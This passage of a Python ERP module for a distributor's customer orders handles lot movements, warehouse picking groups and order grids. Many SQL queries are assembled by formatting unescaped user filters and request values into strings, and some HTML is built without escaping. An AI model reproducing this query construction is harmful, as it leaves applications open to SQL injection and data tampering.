'\", codAlmacen, u\"'\"))\n if idStock == u\"\" or not idStock:\n resul['status'] = -1\n resul['msg'] = \"No existe stock para la referencia '{}' en el almacén '{}'\".format(referencia, codAlmacen)\n resul['param'] = idLinea\n return resul\n\n hoy = qsatype.Date()\n idmovilote = qsatype.FLUtil.sqlSelect(u\"movilote\", u\"id\", u\"idlineapc = '{}' AND fecha = '{}' AND codlote = '{}' AND idlineaac is null\".format(idLinea, hoy, codLote))\n if idmovilote:\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.select(\"id = '{}\".format(idmovilote))\n if not curMovilote.first():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n curMovilote.setModeAccess(curMovilote.Edit)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", curMovilote.valueBuffer(\"cantidad\") + cantidad)\n if not curMovilote.commitBuffer():\n resul['status'] = -3\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n else:\n cantidad = cantidad * -1\n curMovilote = qsatype.FLSqlCursor(u\"movilote\")\n curMovilote.setModeAccess(curMovilote.Insert)\n curMovilote.refreshBuffer()\n curMovilote.setValueBuffer(\"cantidad\", cantidad)\n curMovilote.setValueBuffer(\"idstock\", idStock)\n curMovilote.setValueBuffer(\"tipo\", \"Salida\")\n curMovilote.setValueBuffer(\"codlote\", codLote)\n curMovilote.setValueBuffer(\"docorigen\", \"PC\")\n curMovilote.setValueBuffer(\"fecha\", hoy)\n curMovilote.setValueBuffer(\"idlineapc\", idLinea)\n\n if not curMovilote.commitBuffer():\n resul['status'] = -1\n resul['msg'] = \"Error al crear movimiento de lote\"\n resul['param'] = idLinea\n return resul\n\n resul['status'] = 0\n resul['msg'] = \"OK\"\n resul['param'] = idLinea\n return resul\n return None\n\n def sanhigia_pedidos_getFilters(self, model, name, template=None):\n filters = []\n if name == 'pedidosNoBorradores':\n filtro_estadopago = self.dameFiltroEstadoPago()\n acodpedido = []\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"pedidoscli\")\n q.setSelect(u\"codigo\")\n q.setFrom(u\"pedidoscli\")\n q.setWhere(u\"pda IN ('Pendiente', 'Listo PDA', 'Preparado', 'Albaranado', 'Parcial') AND servido IN ('No', 'Parcial') AND (sh_estadopago NOT IN ({}) OR sh_estadopago is null)\".format(filtro_estadopago))\n if not q.exec_():\n return []\n # if q.size() > 100:\n # return []\n while q.next():\n acodpedido.append(q.value(\"codigo\"))\n filters.append({'criterio': 'codigo__in', 'valor': acodpedido, 'tipo': 'q'})\n if name == 'nocompletados':\n filters.append({'criterio': 'codagente__in', 'valor': [agente[0].codagente]})\n return filters\n\n def sanhigia_pedidos_agruparPedidos(self, model, oParam):\n response = {}\n if (\"selecteds\" not in oParam or not oParam['selecteds']) and \"data\" not in oParam:\n response['status'] = -1\n response['msg'] = \"Debes seleccionar pedido Desde y Hasta\"\n return response\n # or (\"data\" in oParam and not oParam[\"data\"][\"descripcion\"])\n if \"data\" not in oParam or (\"data\" in oParam and not oParam[\"data\"][\"descripcion\"]):\n response['status'] = -1\n if \"data\" in oParam and not oParam[\"data\"][\"descripcion\"]:\n response[\"title\"] = \"Campo descripción es obligatorio\"\n response['data'] = {\"selecteds\": oParam[\"data\"]['selecteds'], \"ubicacionini\": oParam[\"data\"][\"ubicacionini\"], \"ubicacionfin\": oParam[\"data\"][\"ubicacionfin\"]}\n else:\n response['data'] = {\"selecteds\": oParam['selecteds']}\n response['params'] = [\n {\n \"tipo\": 3,\n 
\"required\": True,\n \"verbose_name\": \"Descripción\",\n \"key\": \"descripcion\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"ubicacionini\",\n \"desc\": \"codubicacion\",\n \"disabled_name\": \"Ubicacion Inicial\",\n \"auto_name\": \"Ubicacion Inicial\",\n \"tipo\": 55,\n \"rel\": \"sh_ubicaciones\",\n \"function\": \"getCodUbicacion\",\n \"className\": \"relatedField\",\n \"to_field\": \"codubicacion\"\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"ubicacionfin\",\n \"desc\": \"codubicacion\",\n \"disabled_name\": \"Ubicacion Final\",\n \"auto_name\": \"Ubicacion Final\",\n \"tipo\": 55,\n \"rel\": \"sh_ubicaciones\",\n \"function\": \"getCodUbicacion\",\n \"className\": \"relatedField\",\n \"to_field\": \"codubicacion\"\n }\n ]\n return response\n response = {}\n arrPedidoscli = oParam[\"data\"]['selecteds'].split(u\",\")\n if len(arrPedidoscli) == 0:\n response['status'] = -1\n response['msg'] = \"Debes seleccionar al menos un pedido\"\n return response\n\n # print(\"_____generarpreparacion____\")\n preparacion = self.sanhigia_pedidos_generaPreparaciondepedidos(model, oParam[\"data\"])\n # print(preparacion)\n if not preparacion:\n response['status'] = -1\n response['msg'] = \"Error al generar la agrupación\"\n return response\n\n if \"preparacion\" not in preparacion:\n return preparacion\n\n response['status'] = 1\n response['url'] = \"/facturacion/sh_preparaciondepedidos/{}\".format(preparacion[\"preparacion\"])\n return response\n\n def sanhigia_pedidos_generaPreparaciondepedidos(self, model, oParam):\n resul = {}\n ubicacionini = oParam[\"ubicacionini\"]\n ubicacionfin = oParam[\"ubicacionfin\"]\n pedidoscli = \"'\" + \"','\".join(oParam['selecteds'].split(\",\")) + \"'\"\n consulta_where = u\"l.idpedido IN ({0}) AND u.codubicacion >= '{1}' AND u.codubicacion <= '{2}' AND (l.sh_preparacion is null OR l.sh_preparacion NOT LIKE 'En Curso') AND l.cantidad > l.totalenalbaran AND NOT l.cerrada GROUP BY l.idlinea\".format(pedidoscli, ubicacionini, ubicacionfin)\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"lineaspedidoscli, ubicacionesarticulo\")\n query.setSelect(u\"l.idlinea\")\n query.setFrom(u\"lineaspedidoscli l LEFT OUTER JOIN ubicacionesarticulo u ON l.referencia = u.referencia\")\n query.setWhere(consulta_where)\n if not query.exec_():\n resul['status'] = -2\n resul['msg'] = \"Error al ejecutar la consulta\"\n return resul\n if query.size() < 1:\n resul['status'] = -2\n resul['msg'] = \"No se encuentran elementos que cumplan los requisitos\"\n return resul\n if query.size() > 0:\n curPreparaciondepedidos = qsatype.FLSqlCursor(u\"sh_preparaciondepedidos\")\n codpreparacion = qsatype.FLUtil.nextCounter(u\"codpreparaciondepedido\", curPreparaciondepedidos)\n curPreparaciondepedidos.setModeAccess(curPreparaciondepedidos.Insert)\n curPreparaciondepedidos.refreshBuffer()\n curPreparaciondepedidos.setValueBuffer(u\"codpreparaciondepedido\", codpreparacion)\n curPreparaciondepedidos.setValueBuffer(u\"descripcion\", oParam[\"descripcion\"])\n curPreparaciondepedidos.setValueBuffer(u\"fecha\", qsatype.Date())\n curPreparaciondepedidos.setValueBuffer(u\"ubicacionini\", oParam[\"ubicacionini\"])\n curPreparaciondepedidos.setValueBuffer(u\"ubicacionfin\", oParam[\"ubicacionfin\"])\n # curPreparaciondepedidos.setValueBuffer(u\"desdehasta\", oParam[\"selecteds\"])\n if not curPreparaciondepedidos.commitBuffer():\n return 
False\n while query.next():\n if not qsatype.FLUtil.execSql(u\"UPDATE lineaspedidoscli set sh_preparacion = 'En Curso', codpreparaciondepedido='{0}', cerradapda = false WHERE idlinea = {1}\".format(codpreparacion, query.value(0))):\n resul['status'] = -2\n resul['msg'] = \"Error al asignar línea {}\".format(query.value(0))\n return resul\n resul[\"status\"] = 1\n resul[\"preparacion\"] = codpreparacion\n return resul\n else:\n resul['status'] = -2\n resul['msg'] = \"No se encuentran elementos que cumplan los requisitos\"\n return resul\n\n def sanhigia_pedidos_generaPreparaciondepedidosConStock(self, model, oParam):\n resul = {}\n ubicacionini = oParam[\"ubicacionini\"]\n ubicacionfin = oParam[\"ubicacionfin\"]\n pendientes_pago = oParam[\"pendientespago\"]\n filtro_estadopago = self.dameFiltroEstadoPago()\n if pendientes_pago is None:\n filtro_estadopago += \",'Pagos pendientes'\"\n # TODO query ver numero de lineas si > 100 o < 1 avisar\n # numLineas = qsatype.FLUtil.execSql(ustr(u\"select l.idlinea from WHERE \")\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"pedidoscli,lineaspedidoscli, ubicacionesarticulo\")\n query.setSelect(u\"l.idlinea\")\n query.setFrom(u\"pedidoscli p INNER JOIN lineaspedidoscli l on l.idpedido = p.idpedido LEFT JOIN ubicacionesarticulo u ON l.referencia = u.referencia LEFT JOIN stocks s ON (l.referencia = s.referencia)\")\n where_consulta = u\"p.servido in ('No','Parcial') AND p.pda IN ('Pendiente', 'Listo PDA', 'Preparado', 'Parcial') AND u.codubicacion >= '{0}' AND u.codubicacion <= '{1}' AND (l.sh_preparacion is null OR l.sh_preparacion NOT LIKE 'En Curso') AND l.totalenalbaran <> l.cantidad AND s.cantidad > 0 AND (p.sh_estadopago not in ({2}) OR p.sh_estadopago is null)\".format(ubicacionini, ubicacionfin, filtro_estadopago)\n if \"fechaini\" in oParam and oParam[\"fechaini\"] is not None:\n where_consulta = \"{0} AND p.fecha >= '{1}'\".format(where_consulta, oParam[\"fechaini\"])\n if \"fechafin\" in oParam and oParam[\"fechafin\"] is not None:\n where_consulta = \"{0} AND p.fecha <= '{1}'\".format(where_consulta, oParam[\"fechafin\"])\n array_referencias = []\n where_referencias = None\n if \"referencia1\" in oParam and oParam[\"referencia1\"] is not None:\n array_referencias.append(oParam[\"referencia1\"])\n if \"referencia2\" in oParam and oParam[\"referencia2\"] is not None:\n array_referencias.append(oParam[\"referencia2\"])\n if len(array_referencias) > 0:\n where_referencias = \"','\".join(array_referencias)\n if where_referencias is not None:\n where_consulta = \"{0} AND l.referencia IN ('{1}')\".format(where_consulta, where_referencias)\n\n query.setWhere(where_consulta)\n if query.exec_():\n if query.size() >= 1:\n # print(\"hay mas de uno\", query.size())\n curPreparaciondepedidos = qsatype.FLSqlCursor(u\"sh_preparaciondepedidos\")\n codpreparacion = qsatype.FLUtil.nextCounter(u\"codpreparaciondepedido\", curPreparaciondepedidos)\n if not codpreparacion:\n return False\n if not qsatype.FLUtil.execSql(u\"UPDATE lineaspedidoscli set sh_preparacion = 'En Curso', codpreparaciondepedido='{0}' WHERE idlinea IN (select l.idlinea from pedidoscli p INNER JOIN lineaspedidoscli l on l.idpedido = p.idpedido LEFT JOIN ubicacionesarticulo u ON l.referencia = u.referencia LEFT JOIN stocks s ON l.referencia = s.referencia WHERE {1})\".format(codpreparacion, where_consulta)):\n return False\n curPreparaciondepedidos.setModeAccess(curPreparaciondepedidos.Insert)\n curPreparaciondepedidos.refreshBuffer()\n 
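# ---------------------------------------------------------------------------
# generaPreparaciondepedidosConStock builds its WHERE clause by appending one
# condition per optional filter (fechaini, fechafin, referencia1/2). A compact
# sketch of that composition pattern, using placeholders instead of string
# interpolation (a hardening suggestion, not how FLSqlQuery is invoked above):
# ---------------------------------------------------------------------------
def build_where(oParam):
    conds, params = ["p.servido IN ('No', 'Parcial')"], []
    if oParam.get("fechaini") is not None:
        conds.append("p.fecha >= ?")
        params.append(oParam["fechaini"])
    if oParam.get("fechafin") is not None:
        conds.append("p.fecha <= ?")
        params.append(oParam["fechafin"])
    refs = [oParam[k] for k in ("referencia1", "referencia2") if oParam.get(k) is not None]
    if refs:
        conds.append("l.referencia IN ({})".format(",".join(["?"] * len(refs))))
        params.extend(refs)
    return " AND ".join(conds), params

# Example: build_where({"fechaini": "2021-01-01", "referencia1": "A1"})
# -> ("p.servido IN ('No', 'Parcial') AND p.fecha >= ? AND l.referencia IN (?)",
#     ["2021-01-01", "A1"])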
curPreparaciondepedidos.setValueBuffer(u\"codpreparaciondepedido\", codpreparacion)\n curPreparaciondepedidos.setValueBuffer(u\"descripcion\", oParam[\"descripcion\"])\n curPreparaciondepedidos.setValueBuffer(u\"fecha\", qsatype.Date())\n curPreparaciondepedidos.setValueBuffer(u\"ubicacionini\", oParam[\"ubicacionini\"])\n curPreparaciondepedidos.setValueBuffer(u\"ubicacionfin\", oParam[\"ubicacionfin\"])\n curPreparaciondepedidos.setValueBuffer(u\"desdehasta\", oParam[\"selecteds\"])\n curPreparaciondepedidos.setValueBuffer(u\"tipo\", \"Stock\")\n if not curPreparaciondepedidos.commitBuffer():\n return False\n resul[\"status\"] = 1\n resul[\"preparacion\"] = codpreparacion\n return resul\n else:\n resul['status'] = -2\n resul['msg'] = \"No se encuentran elementos que cumplan los requisitos\"\n return resul\n # return False\n else:\n resul['status'] = -2\n resul['msg'] = \"No se encuentran elementos que cumplan los requisitos\"\n return resul\n return True\n\n def sanhigia_pedidos_agruparpedidosstock(self, model, oParam):\n response = {}\n if \"data\" not in oParam or (\"data\" in oParam and not oParam[\"data\"][\"descripcion\"]):\n response['status'] = -1\n if \"data\" in oParam and not oParam[\"data\"][\"descripcion\"]:\n response[\"title\"] = \"Campo descripción es obligatorio\"\n response['data'] = {\"ubicacionini\": oParam[\"data\"][\"ubicacionini\"], \"ubicacionfin\": oParam[\"data\"][\"ubicacionfin\"], \"fechaini\": oParam[\"data\"][\"fechaini\"], \"fechafin\": oParam[\"data\"][\"fechafin\"]}\n else:\n response['data'] = {\"selecteds\": \"\"}\n response['params'] = [\n {\n \"tipo\": 3,\n \"required\": True,\n \"verbose_name\": \"Descripción\",\n \"key\": \"descripcion\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"ubicacionini\",\n \"desc\": \"codubicacion\",\n \"disabled_name\": \"Ubicacion Inicial\",\n \"auto_name\": \"Ubicacion Inicial\",\n \"tipo\": 55,\n \"rel\": \"sh_ubicaciones\",\n \"function\": \"getCodUbicacion\",\n \"className\": \"relatedField\",\n \"to_field\": \"codubicacion\"\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"ubicacionfin\",\n \"desc\": \"codubicacion\",\n \"disabled_name\": \"Ubicacion Final\",\n \"auto_name\": \"Ubicacion Final\",\n \"tipo\": 55,\n \"rel\": \"sh_ubicaciones\",\n \"function\": \"getCodUbicacion\",\n \"className\": \"relatedField\",\n \"to_field\": \"codubicacion\"\n },\n {\n \"tipo\": 26,\n \"required\": False,\n \"verbose_name\": \"Fecha Inicial\",\n \"key\": \"fechaini\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n },\n {\n \"tipo\": 26,\n \"required\": False,\n \"verbose_name\": \"Fecha Final\",\n \"key\": \"fechafin\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"referencia1\",\n \"desc\": \"referencia\",\n \"disabled_name\": \"Referencia 1\",\n \"auto_name\": \"Referencia 1\",\n \"tipo\": 55,\n \"rel\": \"articulos\",\n \"function\": \"getReferencia\",\n \"className\": \"relatedField\",\n \"to_field\": \"referencia\"\n },\n {\n \"componente\": \"YBFieldDB\",\n \"prefix\": \"otros\",\n \"key\": \"referencia2\",\n \"desc\": \"referencia\",\n \"disabled_name\": \"Referencia 2\",\n \"auto_name\": \"Referencia 2\",\n \"tipo\": 55,\n \"rel\": \"articulos\",\n \"function\": \"getReferencia\",\n \"className\": 
\"relatedField\",\n \"to_field\": \"referencia\"\n },\n {\n \"tipo\": 18,\n \"required\": False,\n \"verbose_name\": \"Pendiente de pago\",\n \"key\": \"pendientespago\",\n \"visible\": True,\n \"validaciones\": None,\n \"style\": {\n \"width\": \"100%\"\n }\n }\n ]\n return response\n preparacion = self.sanhigia_pedidos_generaPreparaciondepedidosConStock(model, oParam[\"data\"])\n if not preparacion:\n response['status'] = -1\n response['msg'] = \"Error al generar la agrupación\"\n return response\n\n if \"preparacion\" not in preparacion:\n return preparacion\n\n response['status'] = 1\n response['url'] = \"/facturacion/sh_preparaciondepedidos/{}\".format(preparacion[\"preparacion\"])\n return response\n\n def sanhigia_pedidos_quitarTrabajador(self, model, oParam):\n # print(oParam)\n response = {}\n if (\"selecteds\" not in oParam or not oParam['selecteds']) and \"data\" not in oParam:\n response['status'] = -1\n response['msg'] = \"Debes seleccionar pedido Desde y Hasta\"\n return response\n response = {}\n\n preparacion = self.sanhigia_pedidos_actualizarTrabajador(model, oParam)\n if not preparacion:\n response['status'] = -1\n response['msg'] = \"Error al quitar el trabajador\"\n return response\n\n return True\n\n def sanhigia_pedidos_actualizarTrabajador(self, model, oParam):\n pedidoscli = \"'\" + \"','\".join(oParam['selecteds'].split(\",\")) + \"'\"\n if not qsatype.FLUtil.sqlUpdate(u\"pedidoscli\", u\"codtrabajador\", u\"\", u\"servido not like 'Sí' AND pda IN ('Pendiente') AND idpedido IN ({})\".format(pedidoscli)):\n return False\n return True\n\n\n def sanhigia_pedidos_visualizarPedido(self, model):\n qPedido = qsatype.FLSqlQuery()\n qPedido.setTablesList(u\"pedidoscli\")\n qPedido.setSelect(u\"codigo, codcliente, nombrecliente, fecha, dirtipovia, direccion, ciudad, provincia, dirnum, dirotros\")\n qPedido.setFrom(u\"pedidoscli\")\n qPedido.setWhere(u\"idpedido = {} \".format(model.idpedido))\n if not qPedido.exec_():\n return response\n if qPedido.next():\n codigo = qPedido.value(\"codigo\")\n nombrecliente = qPedido.value(\"nombrecliente\")\n fecha = qPedido.value(\"fecha\")\n direccion = str(qPedido.value(\"dirtipovia\") or \"\") + \" \" + str(qPedido.value(\"direccion\") or \"\") + \", \" + str(qPedido.value(\"dirnum\") or \"\") + \" \" + str(qPedido.value(\"dirotros\") or \"\") + \", \" + str(qPedido.value(\"ciudad\") or \"\") + \", \" + str(qPedido.value(\"provincia\") or \"\")\n response = {}\n response[\"status\"] = 2\n response[\"confirm\"] = \"
\" + codigo + \"
\" + str(fecha) + \"

\" + nombrecliente + \"

\" + direccion + \"
\"\n response[\"customButtons\"] = []\n q = qsatype.FLSqlQuery()\n q.setTablesList(u\"lineaspedidoscli,stocks\")\n q.setSelect(u\"lineaspedidoscli.descripcion, lineaspedidoscli.shcantalbaran, lineaspedidoscli.cantidad, lineaspedidoscli.totalenalbaran, lineaspedidoscli.referencia, stocks.cantidad\")\n q.setFrom(u\"lineaspedidoscli LEFT OUTER JOIN stocks ON lineaspedidoscli.referencia = stocks.referencia AND stocks.codalmacen = 'ALM'\")\n q.setWhere(u\"idpedido = {} \".format(model.idpedido))\n if not q.exec_():\n return response\n response[\"confirm\"] += \"
Artículos
\"\n while q.next():\n estadoLinea = \"background-color:lightgreen;\"\n if q.value(\"lineaspedidoscli.shcantalbaran\") != q.value(\"lineaspedidoscli.cantidad\"):\n estadoLinea = \"\"\n ubicacion = qsatype.FLUtil.sqlSelect(\"ubicacionesarticulo\", \"codubicacion\", \"referencia = '{}'\".format(q.value(\"lineaspedidoscli.referencia\"))) or \"\"\n response[\"confirm\"] += \" \"\n response[\"confirm\"] += \"
\" + q.value(\"lineaspedidoscli.descripcion\") + \"\" + str(int(q.value(\"lineaspedidoscli.shcantalbaran\") or 0)) + \" / \" + str(int(int(q.value(\"lineaspedidoscli.cantidad\")) - int(q.value(\"lineaspedidoscli.totalenalbaran\")) or 0)) + \"\" + ubicacion + \"Stock: \" + str(int(q.value(\"stocks.cantidad\") or 0)) + \"
\"\n return response\n\n def sanhigia_pedidos_queryGrid_mastershpedidoscli(self, model, filters):\n where = \"1 = 1\"\n valores_estado_pago = self.dameFiltroEstadoPago()\n filtro_estadopago = \"AND (pedidoscli.sh_estadopago is null OR pedidoscli.sh_estadopago NOT IN ({}))\".format(valores_estado_pago)\n if filters and \"[ptespago]\" in filters and filters[\"[ptespago]\"] != \"\":\n filtro_estadopago = \" AND pedidoscli.sh_estadopago = 'Pagos pendientes'\"\n\n f_pedidosNoBorradores = \"pedidoscli.pda IN ('Pendiente', 'Listo PDA', 'Preparado', 'Albaranado', 'Parcial') AND pedidoscli.servido IN ('No', 'Parcial') {}\".format(filtro_estadopago)\n if where is not None:\n where += \" AND \"\n where += f_pedidosNoBorradores\n if filters:\n if \"[codigo]\" in filters and filters[\"[codigo]\"] != \"\":\n where += \" AND pedidoscli.codigo like '%{}%'\".format(filters[\"[codigo]\"])\n if \"[codcliente]\" in filters and filters[\"[codcliente]\"] != \"\":\n where += \" AND (UPPER(pedidoscli.codcliente) like '%{}%' OR UPPER(pedidoscli.nombrecliente) like '%{}%')\".format(filters[\"[codcliente]\"].upper(), filters[\"[codcliente]\"].upper())\n if \"[d_fecha]\" in filters and filters[\"[d_fecha]\"] != \"\":\n where += \" AND pedidoscli.fecha >= '{}'\".format(filters[\"[d_fecha]\"])\n if \"[h_fecha]\" in filters and filters[\"[h_fecha]\"] != \"\":\n where += \" AND pedidoscli.fecha <= '{}'\".format(filters[\"[h_fecha]\"])\n if \"[fecha]\" in filters and filters[\"[fecha]\"] != \"\":\n where += \" AND pedidoscli.fecha = '{}'\".format(filters[\"[fecha]\"])\n if \"[referencia1]\" in filters and filters[\"[referencia1]\"] != \"\":\n where += \" AND lineaspedidoscli.referencia = '{}'\".format(filters[\"[referencia1]\"])\n if \"[referencia2]\" in filters and filters[\"[referencia2]\"] != \"\":\n where += \" AND lineaspedidoscli.referencia = '{}'\".format(filters[\"[referencia2]\"])\n # Cambiar por stocks.cantidad >= (lineaspedidoscli.cantidad - lineaspedidoscli.totalenalbaran) - Pedido por Ines -fecha: 19-03-2021\n if \"[completadostock]\" in filters and filters[\"[completadostock]\"] != \"\":\n where += \" AND NOT lineaspedidoscli.cerrada AND lineaspedidoscli.cantidad > lineaspedidoscli.totalenalbaran AND stocks.cantidad >= (lineaspedidoscli.cantidad - lineaspedidoscli.totalenalbaran)\"\n if \"[codproveedor]\" in filters and filters[\"[codproveedor]\"] != \"\":\n where += \" AND (UPPER(articulosprov.codproveedor) like '%{}%' OR UPPER(articulosprov.nombre) like '%{}%')\".format(filters[\"[codproveedor]\"].upper(), filters[\"[codproveedor]\"].upper())\n # if \"[buscador]\" in filters and filters[\"[buscador]\"] != \"\":\n # where += \" AND UPPER(pedidoscli.nombre) LIKE '%\" + filters[\"[buscador]\"].upper() + \"%' OR UPPER(pedidoscli.nombre) LIKE '%\" + filters[\"[buscador]\"].upper() + \"%' OR UPPER(pedidoscli.nombre) LIKE '%\" + filters[\"[buscador]\"].upper() + \"%'\"\n query = {}\n query[\"tablesList\"] = (\"pedidoscli,lineaspedidoscli,sh_trabajadores\")\n query[\"select\"] = \"pedidoscli.idpedido,pedidoscli.codigo,pedidoscli.nombrecliente,pedidoscli.fecha,pedidoscli.total,pedidoscli.sh_estadopreparacion,pedidoscli.pda,pedidoscli.codtrabajador,sh_trabajadores.nombre,MAX(sh_preparaciondepedidos.descripcion)\"\n query[\"from\"] = (\"pedidoscli INNER JOIN lineaspedidoscli ON pedidoscli.idpedido = lineaspedidoscli.idpedido LEFT OUTER JOIN sh_trabajadores ON pedidoscli.codtrabajador = sh_trabajadores.codtrabajador LEFT OUTER JOIN sh_preparaciondepedidos ON lineaspedidoscli.codpreparaciondepedido = 
sh_preparaciondepedidos.codpreparaciondepedido LEFT JOIN stocks ON (lineaspedidoscli.referencia = stocks.referencia AND stocks.codalmacen='ALM') LEFT OUTER JOIN articulosprov ON (lineaspedidoscli.referencia = articulosprov.referencia AND articulosprov.pordefecto)\")\n query[\"where\"] = (where)\n query[\"groupby\"] = \" pedidoscli.idpedido,pedidoscli.codigo,pedidoscli.nombrecliente,pedidoscli.fecha,pedidoscli.total,pedidoscli.sh_estadopreparacion,pedidoscli.pda,pedidoscli.codtrabajador,sh_trabajadores.nombre\"\n query[\"orderby\"] = (\"pedidoscli.fecha DESC, pedidoscli.codigo DESC, pedidoscli.sh_estadopreparacion DESC\")\n query[\"selectcount\"] = \"count(distinct(pedidoscli.codigo))\"\n return query\n\n def sanhigia_pedidos_visualizarShPedido(self, model, oParam):\n response = {}\n response[\"url\"] = \"/facturacion/pedidoscli/{}\".format(model.pk)\n return response\n\n def sanhigia_pedidos_field_shpedidoscliQuerycolorRow(self, model):\n estado = model[\"pedidoscli.pda\"]\n trabajador = model[\"pedidoscli.codtrabajador\"]\n if estado == \"Listo PDA\":\n return \"cSuccess\"\n elif estado == \"Albaranado\":\n return \"cDanger\"\n elif trabajador:\n return \"cWarning\"\n else:\n return None\n\n def sanhigia_pedidos_creaLote(self, codigo, caducidad, referencia):\n codLote = qsatype.FLUtil.sqlSelect(u\"lotes\", u\"codlote\", u\"codigo = '{0}' AND referencia = '{1}' AND caducidad = '{2}'\".format(codigo, referencia, caducidad))\n if not codLote:\n query = qsatype.FLSqlQuery()\n query.setTablesList(u\"articulos\")\n query.setSelect(u\"descripcion\")\n query.setFrom(u\"articulos\")\n query.setWhere(\"referencia = '{}'\".format(referencia))\n\n if query.exec_():\n if query.next():\n descripcion = query.value(0)\n else:\n return False\n else:\n return False\n\n if not caducidad:\n resul = {}\n resul['status'] = -3\n resul['msg'] = \"F.Caducidad obligatoria\"\n resul['resul'] = False\n return resul\n\n curLote = qsatype.FLSqlCursor(u\"lotes\")\n curLote.setModeAccess(curLote.Insert)\n curLote.refreshBuffer()\n curLote.setValueBuffer(\"codigo\", codigo)\n curLote.setValueBuffer(\"caducidad\", caducidad)\n curLote.setValueBuffer(\"descripcion\", descripcion)\n curLote.setValueBuffer(\"referencia\", referencia)\n curLote.setValueBuffer(\"enalmacen\", 0)\n curLote.setValueBuffer(u\"codlote\", qsatype.FLUtil.nextCounter(u\"codlote\", curLote))\n if curLote.commitBuffer():\n return curLote.valueBuffer(\"codlote\")\n return False\n else:\n return codLote\n\n def sanhigia_pedidos_dameFiltroEstadoPago(self):\n filtro_estadopago = \"'Borrador','Borrador con promocion', 'Forma de pago bloqueada', 'Pendiente validar PA', 'Devolucion por preparar', 'Devolucion preparada', 'Devolucion aprobada', 'Aplicar código aduanas', 'Bloqueado Riesgo', 'Pagos pendientes', 'Pte. 
Validacion promocion'\"\n return filtro_estadopago\n\n def __init__(self, context=None):\n super(sanhigia_pedidos, self).__init__(context)\n\n def getFilters(self, model, name, template=None):\n return self.ctx.sanhigia_pedidos_getFilters(model, name, template)\n\n def procesaCodBarras(self, model, oParam):\n return self.ctx.sanhigia_pedidos_procesaCodBarras(model, oParam)\n\n def dameIdLinea(self, oParam):\n return self.ctx.sanhigia_pedidos_dameIdLinea(oParam)\n\n def respuestaAnalizaCodBarras(self, model, oParam, val):\n return self.ctx.sanhigia_pedidos_respuestaAnalizaCodBarras(model, oParam, val)\n\n def pedidoListoPDA(self, model, oParam):\n return self.ctx.sanhigia_pedidos_pedidoListoPDA(model, oParam)\n\n def initValidation(self, name, data):\n return self.ctx.sanhigia_pedidos_initValidation(name, data)\n\n def field_trabajador(self, model):\n return self.ctx.sanhigia_pedidos_field_trabajador(model)\n\n def field_colorRow(self, model):\n return self.ctx.sanhigia_pedidos_field_colorRow(model)\n\n def getForeignFields(self, model, template):\n return self.ctx.sanhigia_pedidos_getForeignFields(model, template)\n\n def asignarTrabajador(self, idpedido, codtrabajador):\n return self.ctx.sanhigia_pedidos_asignarTrabajador(idpedido, codtrabajador)\n\n def insertarMovilote(self, idLinea, referencia, cantidad, codAlmacen, codLote):\n return self.ctx.sanhigia_pedidos_insertarMovilote(idLinea, referencia, cantidad, codAlmacen, codLote)\n\n def analizaCodBarras(self, idPedido, barcode, cantidad, codAlmacen, idlineapedido):\n return self.ctx.sanhigia_pedidos_analizaCodBarras(idPedido, barcode, cantidad, codAlmacen, idlineapedido)\n\n def analizaCodBarrasLote(self, referencia, barcode, codigo, cantidad, idLinea, codAlmacen):\n return self.ctx.sanhigia_pedidos_analizaCodBarrasLote(referencia, barcode, codigo, cantidad, idLinea, codAlmacen)\n\n def agruparPedidos(self, model, oParam):\n return self.ctx.sanhigia_pedidos_agruparPedidos(model, oParam)\n\n def agruparpedidosstock(self, model, oParam):\n return self.ctx.sanhigia_pedidos_agruparpedidosstock(model, oParam)\n\n def quitarTrabajador(self, model, oParam):\n return self.ctx.sanhigia_pedidos_quitarTrabajador(model, oParam)\n\n def field_descPreparacion(self, model):\n return self.ctx.sanhigia_pedidos_field_descPreparacion(model)\n\n def actualizarTrabajador(self, model, oParam):\n return self.ctx.sanhigia_pedidos_actualizarTrabajador(model, oParam)\n\n def visualizarPedido(self, model):\n return self.ctx.sanhigia_pedidos_visualizarPedido(model)\n\n def queryGrid_mastershpedidoscli(self, model, filters):\n return self.ctx.sanhigia_pedidos_queryGrid_mastershpedidoscli(model, filters)\n\n def visualizarShPedido(self, model, oParam):\n return self.ctx.sanhigia_pedidos_visualizarShPedido(model, oParam)\n\n def field_shpedidoscliQuerycolorRow(self, model):\n return self.ctx.sanhigia_pedidos_field_shpedidoscliQuerycolorRow(model)\n\n def creaLote(self, codigo, caducidad, referencia):\n return self.ctx.sanhigia_pedidos_creaLote(codigo, caducidad, referencia)\n\n def dameFiltroEstadoPago(self):\n return self.ctx.sanhigia_pedidos_dameFiltroEstadoPago()\n\n","sub_path":"model_flfacturac__pedidoscli_def.py","file_name":"model_flfacturac__pedidoscli_def.py","file_ext":"py","file_size_in_byte":86417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"625495473","text":"#############################\n#############################\n###Load External Modules###\nimport 
